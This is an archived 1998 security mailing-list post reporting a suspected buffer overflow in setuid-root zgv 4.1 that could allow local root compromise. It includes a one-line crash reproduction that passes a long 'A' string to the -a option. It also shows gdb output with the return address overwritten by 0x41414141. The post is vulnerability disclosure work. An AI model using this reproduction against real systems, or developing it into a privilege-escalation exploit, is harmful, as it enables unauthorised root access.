Overflow in zgv-4.1?

From: onix (onixat_private)
Date: Wed Oct 07 1998 - 22:08:13 PDT

Next message: Mnemonix: "WARNING: By-passing MS Proxy packet filtering"

Previous message: Boynton, David, SSgt, AFPOA/DPSM: "Re: Patches for wwwboard.pl (Was: Re: wwwboard.pl vulnerability)"
Next in thread: Paul Boehm: "Re: Overflow in zgv-4.1?"
Reply: Paul Boehm: "Re: Overflow in zgv-4.1?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Possible security risk in setuid zgv 4.1 which may lead to local root
comprimise.  zgv is installed setuid root by default.

onix# zgv -a "`perl -e 'print "A" x 4000'`%s"
Segmentation fault (core dumped)
onix# gdb -c core
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i486-slackware-linux), Copyright 1996 Free Software Foundation,
Inc.
Core was generated by `zgv -a
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x40121a48 in ?? ()
(gdb) backtrace
#0  0x40121a48 in ?? ()
#1  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb)

Next message: Mnemonix: "WARNING: By-passing MS Proxy packet filtering"
Previous message: Boynton, David, SSgt, AFPOA/DPSM: "Re: Patches for wwwboard.pl (Was: Re: wwwboard.pl vulnerability)"
Next in thread: Paul Boehm: "Re: Overflow in zgv-4.1?"
Reply: Paul Boehm: "Re: Overflow in zgv-4.1?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:18:57 PDT